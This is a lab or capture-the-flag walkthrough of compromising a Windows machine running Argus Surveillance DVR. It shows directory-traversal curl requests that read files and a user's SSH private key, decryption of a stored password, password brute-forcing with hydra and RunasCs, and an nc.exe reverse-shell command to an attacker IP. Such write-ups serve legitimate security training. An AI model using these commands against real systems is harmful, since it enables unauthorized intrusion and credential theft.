DVR4

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 4000 -Pn 192.168.201.179
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 14:10 +08
Nmap scan report for 192.168.201.179
Host is up (0.17s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8080/tcp  open  http-proxy
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

SSH is open on this Windows machine, so let's take note of that.

Argus Surveillance -> LFI SSH Key

Port 8080 hosted an Argus Surveillance instance:

There are quite a few exploits for this software:

$ searchsploit argus                         
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Argus Surveillance DVR 4.0 - Unquoted Service Path         | windows/local/50261.txt
Argus Surveillance DVR 4.0 - Weak Password Encryption      | windows/local/50130.py
Argus Surveillance DVR 4.0.0.0 - Directory Traversal       | windows_x86/webapps/45296.txt
Argus Surveillance DVR 4.0.0.0 - Privilege Escalation      | windows_x86/local/45312.c
----------------------------------------------------------- ---------------------------------

The LFI one looks the easiest to exploit, and it involves using curl:

$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

It works, so now we just need to find out what to read. I know that SSH is open, so we should be looking for a SSH private key of some user. On the website, we can view the users to see 2:

viewer is one them, and we can try to read their private key:

$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J
Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP
<TRUNCATED>

Using this, we can ssh into the machine as viewer:

Privilege Escalation

Password Decryption -> SYSTEM Shell

I tested the LFI in reading the administrator flag, and it actually worked:

$ curl "http://192.168.201.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FAdministrator%2FDesktop%2fproof.txt&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
<FLAG>

This means that the application is being run by the administrator instead of viewer. There were other exploits that we didn't use yet. I found that the Weak Password Encryption was one of them. This involved reading the password hash from the configuration files of Argus.

C:\ProgramData\PY_Software\Argus Surveillance DVR>type DVRParams.ini
<TRUNCATED>
LoginName0=Administrator
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8                                    

We can decrypt this hash easily using the script:

$ python3 50130.py 

#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############

[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

The last character is unknown. When looking at the script, it doesn't seem to map special characters within the dictionary. In this case, we can create a wordlist of the special characters.

$ cat /usr/share/seclists/Fuzzing/special-chars.txt > wordlist.txt
$ sed -i -e 's/^/14WatchD0g/' wordlist.txt

Afterwards, we can attempt to brute force the ssh access using hydra:

$ hydra -l administrator -P wordlist.txt 192.168.201.179 ssh

However, this didn't work for some reason, so maybe the administrator does not have SSH access. Instead, I brute forced the passwords one by one with RunasCs.exe to check which worked.

Eventually one worked:

C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g# whoami                               
[-] RunasCsException: CreateProcessWithLogonW failed with 1326                               
C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g$ whoami                               
dvr4\administrator

Great! Now we just need to get a reverse shell. The exploits earlier have the x86 tag, meaning that this is a 32-bit Windows computer and we should be using nc32.exe for a reverse shell.

Then, we just need to execute it:

C:\Windows\Tasks>.\runasc.exe Administrator 14WatchD0g$ "C:\Windows\Tasks\nc.exe -e cmd.exe 1
92.168.45.191 21"